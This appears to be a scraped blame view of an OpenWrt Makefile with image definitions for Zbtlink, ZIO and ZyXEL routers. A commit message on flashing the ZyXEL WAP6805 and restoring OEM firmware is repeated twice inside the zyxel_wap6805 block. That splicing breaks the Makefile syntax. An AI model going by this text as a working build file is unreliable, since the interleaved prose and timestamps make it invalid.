kmod-usb-ledtrig-usbport wpad-basic
endef
TARGET_DEVICES += youku_yk-l2
define Device/zbtlink_zbt-we1326
IMAGE_SIZE := 16064k
DEVICE_VENDOR := Zbtlink
DEVICE_MODEL := ZBT-WE1326
DEVICE_PACKAGES := kmod-mt7603 kmod-mt76x2 kmod-usb3 kmod-sdhci-mt7620 \
wpad-basic
SUPPORTED_DEVICES += zbt-we1326
endef
TARGET_DEVICES += zbtlink_zbt-we1326
define Device/zbtlink_zbt-we3526
IMAGE_SIZE := 16064k
DEVICE_VENDOR := Zbtlink
DEVICE_MODEL := ZBT-WE3526
DEVICE_PACKAGES := kmod-sdhci-mt7620 kmod-mt7603 kmod-mt76x2 kmod-usb3 \
kmod-usb-ledtrig-usbport wpad-basic
endef
TARGET_DEVICES += zbtlink_zbt-we3526
define Device/zbtlink_zbt-wg2626
IMAGE_SIZE := 16064k
DEVICE_VENDOR := Zbtlink
DEVICE_MODEL := ZBT-WG2626
DEVICE_PACKAGES := kmod-ata-ahci kmod-sdhci-mt7620 kmod-mt76x2 kmod-usb3 \
kmod-usb-ledtrig-usbport wpad-basic
SUPPORTED_DEVICES += zbt-wg2626
endef
TARGET_DEVICES += zbtlink_zbt-wg2626
define Device/zbtlink_zbt-wg3526-16m
IMAGE_SIZE := 16064k
DEVICE_VENDOR := Zbtlink
DEVICE_MODEL := ZBT-WG3526
DEVICE_VARIANT := 16M
DEVICE_PACKAGES := kmod-ata-ahci kmod-sdhci-mt7620 kmod-mt7603 kmod-mt76x2 \
kmod-usb3 kmod-usb-ledtrig-usbport wpad-basic
SUPPORTED_DEVICES += zbt-wg3526 zbt-wg3526-16M
endef
TARGET_DEVICES += zbtlink_zbt-wg3526-16m
define Device/zbtlink_zbt-wg3526-32m
IMAGE_SIZE := 32448k
DEVICE_VENDOR := Zbtlink
DEVICE_MODEL := ZBT-WG3526
DEVICE_VARIANT := 32M
DEVICE_PACKAGES := kmod-ata-ahci kmod-sdhci-mt7620 kmod-mt7603 kmod-mt76x2 \
kmod-usb3 kmod-usb-ledtrig-usbport wpad-basic
SUPPORTED_DEVICES += ac1200pro zbt-wg3526-32M
endef
TARGET_DEVICES += zbtlink_zbt-wg3526-32m
define Device/zio_freezio
IMAGE_SIZE := 16064k
DEVICE_VENDOR := ZIO
DEVICE_MODEL := FREEZIO
DEVICE_PACKAGES := kmod-mt7603 kmod-mt76x2 kmod-usb3 \
kmod-usb-ledtrig-usbport wpad-basic
endef
TARGET_DEVICES += zio_freezio
ramips: add support for ZyXEL WAP6805 (Altibox WiFi+) Hardware -------- SoC: MediaTek MT7621ST WiFi: MediaTek MT7603 Quantenna QT3840BC Flash: 128M NAND RAM: 64M LED: Dual colour red and green BTN: Reset WPS Eth: 4 x 10/100/1000 connected to MT7621 internal switch MT7621 RGMII port connected to Quantenna module GPIO: Power/reset of Quantenna module Quantenna module ---------------- The Quantenna QT3840BC (or QV840) is a separate SoC running another Linux installation. It is mounted on a wide mini-PCIe form factor module, but is connected to the RGMII port of the MT7621. It loads both a second uboot stage and an os image from the MT7621 using tftp. The module is configured using Quantenna specific RPC calls over IP, using 802.1q over the RGMII link to support multiple SSIDs. There is no support for using this module as a WiFi device in OpenWrt. A package with basic firmware and management tools is being prepared. Serial ports ------------ Two serial ports with headers: RRJ1 - 115200 8N1 - Connected to the Quantenna console J1 - 57600 8N1 - Connected to the MT7621 console Both share pinout with many other Zyxel/Mitrastar devices: 1 - NC (VDD) 2 - TX 3 - RX 4 - NC (no pin) 5 - GND Dual system partitions ---------------------- The vendor firmware and boot loader use a dual partition scheme storing a counter in the header of each partition. The partition with the highest number will be selected for boot. OpenWrt does not support this scheme and will always use the first OS partition. It will reset both counters to zero the first time sysupgrade is run, making sure the first partition is selected by the boot loader. Installation from vendor firmware --------------------------------- 1. Run a DHCP server. The WAP6805 is configured as a client device and does not have a default static IP address. Make a note of which address it is assigned 2. tftp the OpenWrt initramfs-kernel.bin image to this address. Wait for the WAP6805 to reboot. 3. ssh to the OpenWrt initramfs system on 192.168.1.1. Make a backup of all mtd partitions now. The last used OEM image is still present in either "Kernel" or "Kernel2" at this point, and can be restored later if you save a copy. 4. sysupgrade to the OpenWrt sysupgrade.bin image. Installation from U-Boot ------------------------ This requires serial console access 1. Copy the OpenWrt initramfs-kernel.bin image as "ras.bin" to your tftp server directory. Configure the server address as 192.168.0.33/24 2. Hit ESC when the message "Hit ESC key to stop autoboot" appears 3. Type "ATGU" + Enter, and then "2" immediately after pressing enter. 4. Answer Y to the question "Erase Linux in Flash then burn new one. Are you sure?", and answer the address/filename questions. Defaults: Input device IP (192.168.0.2) Input server IP (192.168.0.33) Input Linux Kernel filename ("ras.bin") 5. Wait until after you see the message "Done!" and power cycle the device. It will hang after flashing. 6. Continue with step 3 and 4 from the vendor firmware procedure. Notes on the WAP6805 U-Boot --------------------------- The bootloader has been modified with both ZyXELs zyloader and the device specific dual partition scheme. These changes appear to have broken a few things. The zyloader shell claims to support a number of ZyXEL AT commands, but not all of them work. The image selection scheme is unreliable and inconsistent. A limited U-Boot menu is available - and used by the above U-Boot install procedure. But direct booting into an uploaded image does not work, neither with ram nor with flash. Flashing works, but requires a hard reset after it is finished. Reverting to OEM firmware ------------------------- The OEM firmware can be restored by using mtd write from OpenWrt, flashing it to the "Kernel" partition. E.g. ssh root@192.168.1.1 "mtd -r -e Kernel write - Kernel" < oem.bin OEM firmwares for the WAP6805 are not avaible for public download, so a backup of the original installation is required. See above. Alternatively, firmware for the WAP6806 (Armor X1) may be used. This is exactly the same hardware. But the branding features do obviously differ. LED controller -------------- Hardware implementation is unknown. The dual-color LED is controlled by 3 GPIOs: 4: red 7: blinking green 13: green Enabling both red and green makes the LED appear yellow. The boot loader enables hardware blinking, causing the green LED to blink slowly on power-on, until the OpenWrt boot mode starts a faster software blink. Signed-off-by: Bjørn Mork <bjorn@mork.no> [fix alphabetic sorting for image build statement] Signed-off-by: Petr Štetiar <ynezz@true.cz>
2018-04-18 19:57:52 +00:00
define Device/zyxel_wap6805
BLOCKSIZE := 128k
PAGESIZE := 2048
KERNEL_SIZE := 4096k
UBINIZE_OPTS := -E 5
IMAGE_SIZE := 32448k
DEVICE_VENDOR := ZyXEL
DEVICE_MODEL := WAP6805
DEVICE_PACKAGES := kmod-mt7603 wpad-basic kmod-mt7621-qtn-rgmii
KERNEL := $(KERNEL_DTB) | uImage lzma | uimage-padhdr 160
ramips: add support for ZyXEL WAP6805 (Altibox WiFi+) Hardware -------- SoC: MediaTek MT7621ST WiFi: MediaTek MT7603 Quantenna QT3840BC Flash: 128M NAND RAM: 64M LED: Dual colour red and green BTN: Reset WPS Eth: 4 x 10/100/1000 connected to MT7621 internal switch MT7621 RGMII port connected to Quantenna module GPIO: Power/reset of Quantenna module Quantenna module ---------------- The Quantenna QT3840BC (or QV840) is a separate SoC running another Linux installation. It is mounted on a wide mini-PCIe form factor module, but is connected to the RGMII port of the MT7621. It loads both a second uboot stage and an os image from the MT7621 using tftp. The module is configured using Quantenna specific RPC calls over IP, using 802.1q over the RGMII link to support multiple SSIDs. There is no support for using this module as a WiFi device in OpenWrt. A package with basic firmware and management tools is being prepared. Serial ports ------------ Two serial ports with headers: RRJ1 - 115200 8N1 - Connected to the Quantenna console J1 - 57600 8N1 - Connected to the MT7621 console Both share pinout with many other Zyxel/Mitrastar devices: 1 - NC (VDD) 2 - TX 3 - RX 4 - NC (no pin) 5 - GND Dual system partitions ---------------------- The vendor firmware and boot loader use a dual partition scheme storing a counter in the header of each partition. The partition with the highest number will be selected for boot. OpenWrt does not support this scheme and will always use the first OS partition. It will reset both counters to zero the first time sysupgrade is run, making sure the first partition is selected by the boot loader. Installation from vendor firmware --------------------------------- 1. Run a DHCP server. The WAP6805 is configured as a client device and does not have a default static IP address. Make a note of which address it is assigned 2. tftp the OpenWrt initramfs-kernel.bin image to this address. Wait for the WAP6805 to reboot. 3. ssh to the OpenWrt initramfs system on 192.168.1.1. Make a backup of all mtd partitions now. The last used OEM image is still present in either "Kernel" or "Kernel2" at this point, and can be restored later if you save a copy. 4. sysupgrade to the OpenWrt sysupgrade.bin image. Installation from U-Boot ------------------------ This requires serial console access 1. Copy the OpenWrt initramfs-kernel.bin image as "ras.bin" to your tftp server directory. Configure the server address as 192.168.0.33/24 2. Hit ESC when the message "Hit ESC key to stop autoboot" appears 3. Type "ATGU" + Enter, and then "2" immediately after pressing enter. 4. Answer Y to the question "Erase Linux in Flash then burn new one. Are you sure?", and answer the address/filename questions. Defaults: Input device IP (192.168.0.2) Input server IP (192.168.0.33) Input Linux Kernel filename ("ras.bin") 5. Wait until after you see the message "Done!" and power cycle the device. It will hang after flashing. 6. Continue with step 3 and 4 from the vendor firmware procedure. Notes on the WAP6805 U-Boot --------------------------- The bootloader has been modified with both ZyXELs zyloader and the device specific dual partition scheme. These changes appear to have broken a few things. The zyloader shell claims to support a number of ZyXEL AT commands, but not all of them work. The image selection scheme is unreliable and inconsistent. A limited U-Boot menu is available - and used by the above U-Boot install procedure. But direct booting into an uploaded image does not work, neither with ram nor with flash. Flashing works, but requires a hard reset after it is finished. Reverting to OEM firmware ------------------------- The OEM firmware can be restored by using mtd write from OpenWrt, flashing it to the "Kernel" partition. E.g. ssh root@192.168.1.1 "mtd -r -e Kernel write - Kernel" < oem.bin OEM firmwares for the WAP6805 are not avaible for public download, so a backup of the original installation is required. See above. Alternatively, firmware for the WAP6806 (Armor X1) may be used. This is exactly the same hardware. But the branding features do obviously differ. LED controller -------------- Hardware implementation is unknown. The dual-color LED is controlled by 3 GPIOs: 4: red 7: blinking green 13: green Enabling both red and green makes the LED appear yellow. The boot loader enables hardware blinking, causing the green LED to blink slowly on power-on, until the OpenWrt boot mode starts a faster software blink. Signed-off-by: Bjørn Mork <bjorn@mork.no> [fix alphabetic sorting for image build statement] Signed-off-by: Petr Štetiar <ynezz@true.cz>
2018-04-18 19:57:52 +00:00
IMAGE/sysupgrade.bin := sysupgrade-tar | append-metadata
endef
TARGET_DEVICES += zyxel_wap6805